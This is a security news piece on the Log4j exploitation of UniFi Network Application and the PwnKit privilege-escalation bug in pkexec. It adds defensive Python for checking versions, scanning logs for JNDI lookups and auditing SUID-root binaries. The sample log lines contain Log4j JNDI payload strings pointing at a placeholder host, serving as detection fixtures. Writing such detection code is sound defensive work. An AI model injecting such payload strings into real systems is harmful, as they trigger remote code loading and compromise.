At the beginning of this week, it was reported that yet another application has been targeted by a customised exploit for the Log4j vulnerability. Researchers at Morphisec announced that Ubiquiti’s UniFi Network applications are vulnerable to the exploit, with the first successful exploitation being tracked back to 20th January 2022.
UniFi Network is an application, available for macOS, Linux and Windows, that is used to set up and manage UniFi Network devices, and to monitor and control the network they form.
The underlying flaw is the Log4j vulnerability tracked as CVE-2021-44228, which carries a CVSS score of 10; in the UniFi Network Application it has so far been identified only in versions prior to UniFi Network Application 6.5.54. The vulnerability is critical because it gives an attacker remote code execution, but what is most worrying is that the command-and-control server used in this attack has been correlated with a previous SolarWinds attack reported by CrowdStrike.
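As an added example (not code from the article, Morphisec or Ubiquiti), the check below does two things a defender would want after reading the paragraph above: it compares an installed UniFi Network Application version against the 6.5.54 fix version named on the page, and it scans web-access log lines for the Log4j JNDI lookup string that CVE-2021-44228 abuses. The log lines, IP addresses and hostnames are constructed for the demonstration; the `.invalid` domain is a reserved placeholder.

```python
import re

# Fixed version stated on the page: builds before 6.5.54 are affected.
FIXED_VERSION = (6, 5, 54)

# Case-insensitive match for a Log4j JNDI lookup, e.g. "${jndi:ldap:...}".
# Real detection rules also normalise nested lookups; this one matches
# the plain form only, which is enough to illustrate the indicator.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)\s*:", re.IGNORECASE)


def parse_version(version: str) -> tuple:
    """Turn a dotted version string such as '6.5.53' into a comparable tuple."""
    return tuple(int(part) for part in version.strip().split("."))


def is_affected_unifi_version(version: str) -> bool:
    """True when the installed version predates the 6.5.54 fix."""
    return parse_version(version) < FIXED_VERSION


def find_jndi_lookups(log_lines):
    """Return one record per log line that carries a JNDI lookup string."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = JNDI_LOOKUP.search(line)
        if match:
            hits.append({
                "line": number,
                "scheme": match.group("scheme").lower(),
                "text": line.strip(),
            })
    return hits


# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Jan/2022:10:14:02 +0000] "GET /manage/account/login HTTP/1.1" 200',
    '198.51.100.7 - - [20/Jan/2022:10:14:05 +0000] "POST /api/login HTTP/1.1" 400 "${jndi:ldap://lookup.example.invalid/x}"',
    '198.51.100.7 - - [20/Jan/2022:10:14:06 +0000] "POST /api/login HTTP/1.1" 400 "${JNDI:rmi://lookup.example.invalid/y}"',
    '192.0.2.11 - - [20/Jan/2022:10:15:00 +0000] "GET /status HTTP/1.1" 200',
]


if __name__ == "__main__":
    for version in ("6.5.53", "6.5.54", "7.0.20"):
        print(version, "affected" if is_affected_unifi_version(version) else "fixed")
    for hit in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {hit['line']}: JNDI lookup via {hit['scheme']} -> {hit['text']}")
```

The version check is only meaningful for the UniFi build itself; the log scan is the quicker triage step, since the lookup string has to reach the logging call to trigger the bug, and the scheme it names tells you which outbound protocol to look for in egress logs.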
Discussing the discovery of this vulnerability, in coverage carried by InfoRiskToday UK and across the ISMG estate, John Goodacre, director of the UKRI’s Digital Security by Design challenge and Professor of Computer Architectures at Manchester University, said:
“The continued use of known vulnerabilities shows the complexity on both system administrators and software suppliers to keep up with the need to patch. Given the historic investment and likelihood developers will continue to create vulnerable code, it’s important everyone understands how future hardware can help protect software from exploitation by design, and that developers are provided additional tools and capabilities that bring down the costs of delivering products secured by default. The UKRI Digital Security by Design (DSbD) programme is supporting industry to deliver new underpinning technologies with the recently announced DSbD Technology Access programme offering developers the opportunity to understand and evaluate the resulting benefits to their business.”
Another piece of research that caught our eye was the discovery of a memory corruption vulnerability, tracked as CVE-2021-4034 and also known as Pwnkit. Researchers at Qualys found the bug in polkit’s pkexec, a SUID-root program installed by default on all Linux distributions; exploiting it gives an unprivileged local user full root privileges on the vulnerable host. This vulnerability is especially worrying because pkexec, as part of Polkit, provides the foundation for critical software running on servers, phones and the Linux kernel.
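Because the paragraph above turns on pkexec being SUID-root, the first thing an administrator wants to know is which SUID binaries a host carries and whether pkexec is among them. The audit below is an added example (not code from the article or from Qualys or the polkit project): it inspects the setuid bit and owner of a list of paths and reports which ones would run as root for any local user. The `/usr/bin/pkexec` path is the usual location but is an assumption about the host, and a missing file is reported rather than treated as an error so the script runs on any system.

```python
import os
import stat
from typing import Dict, List


def is_setuid_mode(mode: int) -> bool:
    """True when a raw st_mode value has the setuid bit set."""
    return bool(mode & stat.S_ISUID)


def describe_binary(path: str) -> Dict[str, object]:
    """Describe one path: whether it exists, is setuid, and is owned by root (uid 0)."""
    record: Dict[str, object] = {"path": path, "exists": False, "setuid": False,
                                 "root_owned": False, "runs_as_root": False}
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return record
    record["exists"] = True
    record["setuid"] = is_setuid_mode(st.st_mode)
    record["root_owned"] = st.st_uid == 0
    # Only a root-owned file with the setuid bit runs as root for other users.
    record["runs_as_root"] = bool(record["setuid"] and record["root_owned"])
    return record


def audit(paths: List[str]) -> List[Dict[str, object]]:
    """Audit several paths and return only those that run as root when invoked."""
    return [rec for rec in (describe_binary(p) for p in paths) if rec["runs_as_root"]]


# Assumed path for pkexec; adjust for the distribution being checked.
CANDIDATES = ["/usr/bin/pkexec", "/usr/bin/passwd", "/usr/bin/sudo"]

if __name__ == "__main__":
    for rec in (describe_binary(p) for p in CANDIDATES):
        if not rec["exists"]:
            print(f"{rec['path']}: not present")
        elif rec["runs_as_root"]:
            print(f"{rec['path']}: SUID-root (check your polkit package is patched for CVE-2021-4034)")
        else:
            print(f"{rec['path']}: present, does not run as root")
```

The pure `is_setuid_mode` helper takes the raw mode value so it can be tested without touching the filesystem; `describe_binary` is the part you would point at a real host. Whether a given pkexec build is patched depends on the distribution's package version, which this script does not attempt to read.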
Commenting on this, John said, “Privilege escalation vulnerabilities such as this are a major weapon in the cyber attacker’s arsenal. Although this bug is independently described as a local privilege escalation, such bugs also permit an attacker to extend the harm initiated via another vulnerability in a specific application and its data, to all data in the machine, and potentially the network.
For decades computers have provided just a few levels of privilege, with software finding it too slow and expensive to use these mechanisms to create more secured solutions. The UKRI Digital Security by Design (DSbD) programme recently announced its Technology Access Programme to offer technology businesses the opportunity to investigate the benefits of the DSbD technology. These technologies are able to provide an arbitrary number of privilege and hardware protected compartments while also providing protection against the exploitation of vulnerabilities.”